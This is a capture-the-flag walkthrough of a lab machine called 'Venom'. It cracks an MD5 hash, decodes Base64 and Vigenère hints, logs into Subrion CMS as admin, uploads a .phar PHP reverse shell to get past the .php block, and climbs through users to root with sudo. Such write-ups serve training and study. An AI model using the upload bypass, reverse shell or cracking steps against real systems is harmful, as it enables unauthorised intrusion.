Venom is a multi‑stage machine that begins with credential recovery from an MD5 hash, pivots through FTP, and reveals a Vigenère‑encoded password for a Subrion CMS admin account. A file upload vulnerability in Subrion provides RCE, followed by lateral movement through multiple users and a final privilege escalation via unrestricted sudo.
Target: 10.10.10.15
Initial vector: MD5 hash → FTP → Vigenère decode → Subrion CMS admin
Exploitation: upload .phar reverse shell
Privilege escalation: user chaining → sudo bash
Initial web inspection reveals an MD5 hash in the page source:
5f2a66f947fa5690c26506f66bde5c23
Crack it:
$ hashcat -a 0 -m 0 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt -> hostinger
$ ftp 10.10.10.15 Name: hostinger Password: hostinger
Inside FTP:
hint.txtDecode the multi‑layer Base64 string:
$ echo 'WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=' \ | base64 -d | base64 -d | base64 -d -> standard vigenere cipher
Decode the second Base64 string to get the cipher tool:
$ echo 'aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=' | base64 -d -> https://cryptii.com/pipes/vigenere-cipher
Use key hostinger to decode:
L7f9l8@J#p%Ue+Q1234 --> E7r9t8@Q#h%Hy+M1234
Add domain:
$ sudo sh -c 'echo "10.10.10.15 venom.box" >> /etc/hosts'
Visit:
http://venom.box -> Subrion CMS 4.2
Admin login:
http://venom.box/panel dora : E7r9t8@Q#h%Hy+M1234
Upload directory:
http://venom.box/panel/uploads
Exploit 49876 attempts to upload a .phar file.
Subrion blocks .php but allows .phar, which PHP still executes.
Create a reverse shell:
$ cp /usr/share/webshells/php/php-reverse-shell.php shell.phar
Listener:
$ nc -nlvp 443
Upload shell.phar and trigger it:
http://venom.box/panel/uploads/shell.phar
Shell obtained as www-data.
$ su hostinger Password: hostinger
Enumerate user files:
/var/www/html/subrion/backup/.htaccess
Inside is a password for nathan:
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
$ su nathan Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
User nathan shell obtained.
Check sudo:
$ sudo -l -> (root) NOPASSWD: ALL
Root:
$ sudo bash # whoami root
Venom is a layered machine: MD5 cracking → FTP hints → Vigenère decoding → Subrion CMS admin → .phar RCE →
user chaining → sudo root.
It’s a fun example of how multiple weak points combine into a full system compromise.